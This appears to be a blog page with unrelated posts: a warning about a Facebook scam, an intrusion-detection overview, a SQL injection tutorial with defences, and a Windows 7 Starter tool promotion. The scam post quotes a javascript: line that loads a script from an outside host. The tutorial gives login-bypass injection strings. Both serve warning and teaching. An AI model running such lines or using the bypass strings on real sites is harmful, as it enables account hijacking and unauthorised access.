Be Careful of Facebook.com Lady Gaga Hacks !

Today, my friend got a message from one of his friends:
Since this seemed quite suspicious, I paid attention and followed it through to the end.
Then, after clicking CONTINUE, some tricky instructions appear:
And sure enough, the process asks you to enter JavaScript into the address bar!
javascript: (a = (b = document). createElement ('script')). src =
'Http://profviewer.info/new.js' b.body.appendChild (a): void (0)
If you press ENTER, all your friends will get the same private message I showed you at the beginning of this post.


Share this post everywhere so that your friends on Facebook stay safe from being hacked!
Those who are interested in that Lady Gaga page, please explore it more.

An overview of Intrusion Detection System


An intrusion detection system (IDS) monitors the entire network and detects intruders; that is, unexpected, unwanted or unauthorized people or programs on the network.
An intrusion detection system has a number of sensors that are used to detect unwanted or unexpected flows of network traffic. The major sensors are as follows:


  • A sensor that monitors log files
  • A sensor that monitors incoming or outgoing TCP connections

How does an Intrusion Detection System work?

An intrusion detection system works by collecting information and then examining it. An IDS collects data from its sensors and analyzes this data to notify the system administrator about malicious activity on the network.

o An intrusion detection system can be run manually but most IT administrators find it easier to automate the system checks to ensure that nothing is accidentally overlooked.
o We can categorize IDSs into two main types:

1. NIDS (Network Intrusion Detection Systems).
2. HIDS (Host Intrusion Detection Systems)

There is still a question: why use an IDS if there is a firewall to perform these tasks? A firewall is used to stop unwanted traffic from entering or leaving the internal enterprise network, whereas an IDS is deployed to monitor traffic in vital segments of the network, generating alerts when an intrusion is detected.

A firewall has holes to let things through; without them you wouldn't be able to access the Internet or send or receive emails. There are different ways to bypass or cheat a firewall.
Snort is an excellent open source Network Intrusion Detection System; OSSEC is an open source Host-based Intrusion Detection System.

Below is an overview of the basic architecture as well as practical examples of how to customize an Open Source Host-based Intrusion Detection System to manage logging from your infrastructure and applications.


How to hack a Website ?

I want to show you just one way that hackers can get in to your website and mess it up, using a technique called SQL Injection. And then I'll show you how to fix it. This article touches on some technical topics, but I'll try to keep things as simple as possible. There are a few very short code examples written in PHP and SQL. These are for the techies, but you don't have to fully understand the examples to be able to follow what is going on. Please also note that the examples used are extremely simple, and Real Hackers™ will use many variations on the examples listed.

If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway. If your site does use a database, and has an administrator login who has rights to update the site, or indeed any forms which can be used to submit content to the site — even a comment form — read on.

Warning

This article will show you how you can hack in to vulnerable websites, and to check your own website for one specific vulnerability. It's OK to play around with this on your own site (but be careful!) but do not be tempted to try it out on a site you do not own. If the site is properly managed, an attempt to log in using this or similar methods will be detected and you might find yourself facing charges under the Computer Misuse Act. Penalties under this act are severe, including heavy fines or even imprisonment.

What is SQL Injection?

SQL stands for Structured Query Language, and it is the language used by most website databases. SQL Injection is a technique used by hackers to add their own SQL to your site's SQL to gain access to confidential information or to change or delete the data that keeps your website running. I'm going to talk about just one form of SQL Injection attack that allows a hacker to log in as an administrator - even if he doesn't know the password.

Is your site vulnerable?

If your website has a login form for an administrator to log in, go to your site now, in the username field type the administrator user name.

In the password field, type or paste this:

x' or 'a' = 'a

If the website didn't let you log in using this string you can relax a bit; this article probably doesn't apply to you. However you might like to try this alternative:

x' or 1=1--

Or you could try pasting either or both of the above strings into both the login and password field. Or if you are familiar with SQL you could try a few other variations. A hacker who really wants to get access to your site will try many variations before he gives up.

If you were able to log in using any of these methods then get your web tech to read this article, and to read up all the other methods of SQL Injection. The hackers and "skript kiddies" know all this stuff; your web techs need to know it too.

The technical stuff

If you were able to log in, then the code which generates the SQL for the login looks something like this:

$sql =
"SELECT * FROM users " .
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

When you log in normally, let's say using userid admin and password secret, what happens is that admin is put in place of $username and secret is put in place of $password. The SQL that is generated then looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'secret'

But when you enter x' or 'a' = 'a as the password, the SQL which is generated looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x' or 'a' = 'a'

Notice that the string x' or 'a' = 'a has injected an extra phrase into the WHERE clause: or 'a' = 'a'. This means that the WHERE is always true, and so this query will return a row containing the user's details.

If there is only a single user defined in the database, then that user's details will always be returned and the system will allow you to log in. If you have multiple users, then one of those users will be returned at random. If you are lucky, it will be a user without administration rights (although it might be a user who has paid to access the site). Do you feel lucky?

How to defend against this type of attack

Fixing this security hole isn't difficult. There are several ways to do it. If you are using MySQL, for example, the simplest method is to escape the username and password, using the mysql_escape_string() or mysql_real_escape_string() functions, e.g.:

// Escape both values before they are placed inside the quoted SQL strings
$username = mysql_real_escape_string($username);
$password = mysql_real_escape_string($password);
$sql =
"SELECT * FROM users " .
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

Now when the SQL is built, it will come out as:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x\' or \'a\' = \'a'

Those backslashes ( \ ) make the database treat the quote as a normal character rather than as a delimiter, so the database no longer interprets the SQL as having an OR in the WHERE clause.

This is just a simplistic example. In practice you will do a bit more than this as there are many variations on this attack. For example, you might structure the SQL differently, fetch the user using the user name only and then check manually that the password matches or make sure you always use bind variables (the best defence against SQL injection and strongly recommended!). And you should always escape all incoming data using the appropriate functions from whatever language your website is written in - not just data that is being used for login.
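
The bind-variable defence recommended above, as an added example (not code from the original article): it runs the article's concatenated query and a parameterised query against the same login attempts. It assumes PDO with an in-memory SQLite database instead of MySQL, a constructed users table with a pw_hash column checked by password_verify(), and hypothetical function names.

```php
<?php
// Constructed sample data: table layout, accounts and passwords are illustrative only.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, pw_hash TEXT)');

// "password" holds plain text only so the article's vulnerable query can run as written.
$ins = $db->prepare('INSERT INTO users VALUES (?, ?, ?)');
$ins->execute(['admin', 'secret', password_hash('secret', PASSWORD_DEFAULT)]);
$ins->execute(['alice', 'hunter2', password_hash('hunter2', PASSWORD_DEFAULT)]);

// Vulnerable: the article's query, built by string concatenation.
function login_concat(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT * FROM users " .
           "WHERE username = '" . $username .
           "' AND password = '" . $password . "'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: the user name travels as a bound parameter, never as SQL text,
// and the password is checked in PHP against the stored hash.
function login_bound(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($password, $hash);
}

// The two test strings from the article, plus a correct and a wrong password.
$attempts = [
    ['admin', 'secret'],
    ['admin', 'wrong'],
    ['admin', "x' or 'a' = 'a"],
    ['admin', "x' or 1=1--"],
];
foreach ($attempts as [$user, $pass]) {
    $concat = var_export(login_concat($db, $user, $pass), true);
    $bound  = var_export(login_bound($db, $user, $pass), true);
    printf("%-16s concat=%-5s bound=%s\n", $pass, $concat, $bound);
}
```

The mysql_* functions shown earlier were removed in PHP 7.0, so on current PHP the prepared-statement route (PDO or mysqli) is the one available.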

How To Change Windows 7 Starter Desktop Background, Window Color, Sounds And Screen Saver ?

Today I am going to present a really interesting utility for Windows 7 Starter users. You might be facing some problems when you have to change the desktop or display settings. You can't apply a desktop wallpaper or screensaver, or change the sound settings, desktop icons and much more. Moreover, without these functions your laptop is like a boring idiot box in front of you. But that is no longer a problem. The new tool Personalisation Panel for Windows 7 Starter sorts out your problems and makes your laptop interesting. It will help you to adjust the display settings.

The tool is very light freeware, so it downloads very quickly. It is portable and easy to use. Though the tool is self-explanatory, the description given below will help you to understand and use it. The various options available are shown in the snapshot below.

It helps you to change the Desktop Background, Window Color, Screen Saver and Sounds. You might have installed certain software for this purpose. It either does not provide all the functions or creates problems in use.

Options are also available for changing the desktop icons. There are many icons available. The mouse pointers can also be changed. For every purpose, you can choose a new pointer from the list. You can set a new account picture. The picture will be displayed on the Welcome screen and the Start menu. You can either select a picture that the tool provides or browse for one of your choice from your photo gallery.

The tool helps you to change the display settings also. There are two display modes. The screen resolution can be varied. There are four types of orientation: Landscape, Portrait, Landscape (flipped) and Portrait (flipped).

Even the Taskbar and Start Menu can become interesting by changing their settings. The taskbar can be locked and set to auto-hide. It can be moved to the top, left, right or bottom. The size of the icons on the taskbar can be decreased. The display of taskbar buttons can be adjusted. The system tray can be customised. These options will help you to work in a more convenient manner.


Now, Windows 7 Starter can also be viewed in the desired style. It is no longer a plain black screen. View the desktop as you like.

Download Personalisation Panel for Windows 7 Starter